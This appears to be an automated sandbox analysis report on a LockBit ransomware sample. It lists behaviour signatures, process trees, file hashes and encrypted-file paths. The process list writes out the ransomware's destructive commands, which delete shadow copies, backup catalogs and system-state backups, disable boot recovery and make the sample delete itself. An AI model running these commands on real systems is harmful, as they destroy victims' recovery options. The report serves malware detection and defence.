Analysis Overview
SHA256
63b9637406042b4a9ab162e581c935e7f2c20b64ca504c4ae4e947aa43565b52
Threat Level: Known bad
The file ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.7z was found to be: Known bad.
Malicious Activity Summary
Lockbit
Renames multiple (6432) files with added filename extension
Modifies boot configuration data using bcdedit
Deletes shadow copies
Renames multiple (7488) files with added filename extension
Deletes System State backups
Deletes backup catalog
Checks computer location settings
Deletes itself
Enumerates connected drives
Adds Run key to start application
Drops file in Program Files directory
Drops file in Windows directory
Enumerates physical storage devices
Unsigned PE
Checks SCSI registry key(s)
Uses Task Scheduler COM API
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Uses Volume Shadow Copy service COM API
Runs ping.exe
Suspicious use of WriteProcessMemory
Interacts with shadow copies
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-02-15 03:42
Signatures
Unsigned PE
Analysis: behavioral1
Detonation Overview
Submitted
2024-02-15 03:42
Reported
2024-02-15 04:08
Platform
win7-20231215-en
Max time kernel
838s
Max time network
840s
Command Line
Signatures
Lockbit
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Renames multiple (7488) files with added filename extension
Deletes System State backups
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\wbadmin.exe | N/A |
Deletes backup catalog
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\wbadmin.exe | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Windows\CurrentVersion\Run\XO1XADpO01 = "\"C\"" | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\F: | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
Drops file in Program Files directory
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl | C:\Windows\system32\wbadmin.exe | N/A |
| File opened for modification | C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl | C:\Windows\system32\wbadmin.exe | N/A |
| File opened for modification | C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl | C:\Windows\system32\wbadmin.exe | N/A |
Enumerates physical storage devices
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe
"C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
C:\Windows\system32\vssadmin.exe
vssadmin delete shadows /all /quiet
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /All /Quiet
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled No
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\system32\wbadmin.exe
wbadmin DELETE SYSTEMSTATEBACKUP
C:\Windows\system32\wbadmin.exe
wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /All /Quiet
C:\Windows\System32\Wbem\WMIC.exe
wmic shadowcopy delete
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled No
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
C:\Windows\system32\wbadmin.exe
wbadmin DELETE SYSTEMSTATEBACKUP
C:\Windows\system32\wbadmin.exe
wbadmin delete catalog -quiet
C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
C:\Windows\system32\wbadmin.exe
wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 20 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe"
C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 20
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | iplo.ru | udp |
Files
C:\Users\Admin\Desktop\resultlog7.reg
| MD5 | 5ccf0d958f73a0913f0afc2e41e7f36e |
| SHA1 | 157346737b77cb3b2b76606b6db97024d49e1de1 |
| SHA256 | 067ef94254e8cd23ea0e117f5a047320c266a917c542a6f3f480d28d5b9d5321 |
| SHA512 | 8961b21227a6fd0c45c80b7f9675290325078af4f6b96f654f4962963f0abe476a133fb7b20cc3145c235b76641f476f165d453aa80ade3173cdffd93ebf74ba |
C:\Users\Admin\Desktop\resultlog7.reg
| MD5 | cae30cd47b6665a5d5a40e1a11a598ee |
| SHA1 | c83d5be1691c5c192504a9487323fc054b146069 |
| SHA256 | d59767e5c7cd196bae1ee82af15f1e064b6b48f719cec132aeae848210cddc0e |
| SHA512 | 7d2f7dd71ddabd903c02299ab65bc853c7af8a5280cc9cac1db1c1893d19322cd01242a206f2194b593ef01234708c3d76c14b3aaa43267b31e8a52258e70364 |
C:\Users\Admin\Desktop\resultlog7.reg
| MD5 | f99ae366a00221c25775ca62d5dffdd2 |
| SHA1 | 3813d1cd06c3a3e3e371c272248c8b5f452c3f34 |
| SHA256 | 8d125ae61152b5e1ae04ddbda6074ba2997dc3f258c2b27f886ad39e64e8c2a2 |
| SHA512 | a1dbc2e9661e02bbd0f693ea554fb705d4ee57c8cd4158b269a5f91487e7b233afc671dcaa6c96b268e8cc834ac8cc063fad6474470decd84e8cd2b1ec976ce0 |
C:\Program Files\Internet Explorer\SIGNUP\Restore-My-Files.txt
C:\ProgramData\Adobe\Updater6\AdobeESDGlobalApps.xml.abcd
C:\ProgramData\Microsoft\OFFICE\UICaptions\1036\ONINTL.REST.trx_dll.abcd
| MD5 | cdf80ed4bc90de2a7121a3934cdd6d98 |
| SHA1 | 94d57ce43af9a93f4826e515135d1b559073eeac |
| SHA256 | a839d82b4367b99263770584d4b085fd52c5a33660fb4608a4a863ee283077ec |
| SHA512 | c95dd62620469481ac59e09694232856d2108859ed623a5268f3c9388da89787ced5c36327e998605654417d28f1f02c2801c37c2658f24800a436dca983543e |
C:\ProgramData\Microsoft\OFFICE\UICaptions\1036\ONINTL.DLL.trx_dll.abcd
| MD5 | f7cf96450d202189b2aca8aa5eeb0569 |
| SHA1 | d43be108a16323e63f5534eebdb84186bd8c354e |
| SHA256 | 427b42aff0e4e06ed4adc205f3b98de5988ed1e932658409d5a9cfd4e2ed3741 |
| SHA512 | d68caa0ef4c96b4aa7853378f5080aff19c72be29f7bbddcb68d94c04813a84052b6eaa6706ed2ed95ac2b03b3ac1b1d6fa5429ddea6206ea6fc2a21faf6ec0f |
C:\ProgramData\Microsoft\OFFICE\UICaptions\1036\OMSINTL.DLL.trx_dll.abcd
| MD5 | fa030daef99032d601446575c1876b07 |
| SHA1 | 072be7287bdac6232792d4245b4534eb3aab31a2 |
| SHA256 | f60ce852699e848689cf3b164aab5d9058914f91324ac9e26bd649084706ed24 |
| SHA512 | 02be64ed6b51950d597772b2dda0bba80d4bac936b2852ddd81918e23bf77767cb266414b9c179737cb3c761fd44ba1391acbe814731109a1e6929cd88c25ec2 |
C:\ProgramData\Microsoft\OFFICE\UICaptions\1036\MSOINTL.REST.trx_dll.abcd
| MD5 | 28de2fe80dfab381960502836cf00e0f |
| SHA1 | 60b0033432c996bc5ff35ab3953d29c3f98292ca |
| SHA256 | 918fc071794e9f70369ee0fa9b79c50f4a110eb32453fd5f270a311c2d47d835 |
| SHA512 | e8f8e3a2cd2bf80851411eda26d822a1edc7b5762101313862eee5712e6aa8b0bc5f8557417260faebb6252fc7a4e1fa73c783f2a49cf15aca6074247d45bd2c |
C:\ProgramData\Microsoft\OFFICE\UICaptions\1036\MSOINTL.DLL.trx_dll.abcd
| MD5 | a1dcee4bb16da21660f218cceebcb914 |
| SHA1 | 4ed795e0ffa59413e45236fe2e97e57606ce7fd3 |
| SHA256 | 4ba5286e13e4eddcaeb4c97023b03ced45563820f2fcc32a91aaa37fb05f8fd1 |
| SHA512 | 45685a9290f526e6a7e0583eac952cec144eb3d7713377913fb18e6b865bc80ecddfc3bd1efb2db5e9161dcd808b74c0f6efc190213cc787cd1d5d95027c90fe |
C:\ProgramData\Microsoft\OFFICE\UICaptions\1036\MOR6INT.REST.trx_dll.abcd
| MD5 | 413e4698b7052ab559fa39699aa2eaff |
| SHA1 | db545f49db87492254816984a0ca41882893091e |
| SHA256 | 6adf0500929ccf26875ab3ef95ca4ecaac22690a65b2562c380879f954b8ea58 |
| SHA512 | d19d4a7fcef9716574406b7c6264d6ba0f66f06cb42a58267befde34069919c40b392fb960488f8f05aad7be013c2220c4da4705a963477c9f660dd35474c4fd |
C:\ProgramData\Microsoft\OFFICE\UICaptions\1036\MAPIR.DLL.trx_dll.abcd
| MD5 | 3b5cc32b2db653abbedaf430322c009c |
| SHA1 | 7da7585c29b9e71cc4be379a26522cecb0bfb844 |
| SHA256 | f26f74d4259bcd246ba6555dc132685e004c9e4eb9ec3ae8017dd3fe84138999 |
| SHA512 | 8de2015220699db11f2479b3f30b0c19210cdf32aa01bfcd24d203dc03d39cfb44ad2cda784b4853411bed56d588bec9efc0808a942c63e530da38bd305410ea |
C:\ProgramData\Microsoft\OFFICE\UICaptions\1036\GRINTL32.REST.trx_dll.abcd
| MD5 | 867503f6ddfef81b4c4201a8a552c295 |
| SHA1 | 5d2325ed9978b29f4549bed00fa3e92a502768cd |
| SHA256 | 63304fc0271649d820f9e8f040be1d8ae0ec7a98f4265df48915e94667e188cb |
| SHA512 | ee7348db7629339fba16e6435263db61ce8e99b26b6cecd8f4941bb2296838bace428654f0ac79887245ef253c12b1dfc7a24906b638aac167ff25de770c6b8d |
C:\ProgramData\Microsoft\OFFICE\UICaptions\1036\GRINTL32.DLL.trx_dll.abcd
| MD5 | 988b3bb309486ad198d788c7aca7766a |
| SHA1 | 5e2a99456744205bd56ca083400a95f237516d3b |
| SHA256 | b1124f5a1402b3c1aa08f6a6c71c206533689d6d46bb984461f6f38427fc1427 |
| SHA512 | af9167ce41f37b3f98c0360571730cd5095d42e868869dc5db1da085c2b4bb3be15c7019141523e15833390a5e0f62b7a286ac0cfc6b03eee8c33a090e378fca |
C:\ProgramData\Microsoft\OFFICE\UICaptions\1036\ENVELOPR.DLL.trx_dll.abcd
| MD5 | 3e538ce2345718b885062a9e40925614 |
| SHA1 | 240951667224a2c0e9bab57ad97b9c9d90b40fc5 |
| SHA256 | 9943e7795bcc66bb423c2f9343300eaa494d9fcf3b1c4578477c34f2a7ff7759 |
| SHA512 | 90714d5cc1ee0b9c280e395ce9bede63d0d0b9721c501ad2703c5a1a2b9a98fc13a0ffa39ffe9cd342023336e911f465e2a958207d582ca5b61607be08295d3e |
C:\ProgramData\Microsoft\MF\Active.GRL.abcd
| MD5 | a7436f9942f81a02345a7a287eb3cd5e |
| SHA1 | 4295834657c188bd2ff4ab3e8b7be2efc4f79784 |
| SHA256 | c25c7f5949ca884e512c3b725a51f4d93a60de7f05cc89518bfc842d2dcffe82 |
| SHA512 | 5b36a09ca7d6c6f47c44fadca1fc1dcfaa0bc136f46308e88273a37d56b55b18b682382bce08b6f65b0f4155b26b3bd9c8615f61c91eb7456f3ad0c300ea0284 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-02-15 03:42
Reported
2024-02-15 04:08
Platform
win10v2004-20231215-en
Max time kernel
1161s
Max time network
1166s
Command Line
Signatures
Lockbit
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
Renames multiple (6432) files with added filename extension
Deletes System State backups
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\wbadmin.exe | N/A |
Deletes backup catalog
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\wbadmin.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XO1XADpO01 = "\"C\"" | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\F: | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\fr-fr\ui-strings.js.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\jdwpTransport.h | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsSoundRecorder_10.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxBlockMap.xml | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-white\WideTile.scale-125_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarWideTile.scale-150.png | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Templates\1033\Blog.dotx.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\sl-si\ui-strings.js.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.scale-150_contrast-black.png | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.scale-400_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\Snooze.scale-80.png | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\networkmanifest.xml | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\WordR_OEM_Perp-ul-oob.xrm-ms.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\RTL\contrast-white\LargeTile.scale-125.png | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-64_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.targetsize-16.png | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\rename.svg.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\sr-Latn-RS.pak.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\root\Restore-My-Files.txt | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ja-jp\Restore-My-Files.txt | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTest1-ppd.xrm-ms.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteAppList.targetsize-256_altform-unplated.png | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_neutral_split.scale-100_8wekyb3d8bbwe\AppxSignature.p7x | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-60.png | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\Voices\en-US\en-US_female_TTS\ruleset_en-US_TTS.lua | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-cef.css | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\UnifiedShare.aapp.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Common.View.UWP\Strings\es-MX\View3d\3DViewerProductDescription-universal.xml | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-black\PeopleWideTile.scale-125.png | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_checkbox_unselected_18.svg.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_gridview-hover.svg.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.0\Microsoft.NETCore.App.deps.json | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_2.34.28001.0_x64__8wekyb3d8bbwe\Assets\MixerBranding\mixer_logo.png | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\sendforcomments.svg | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
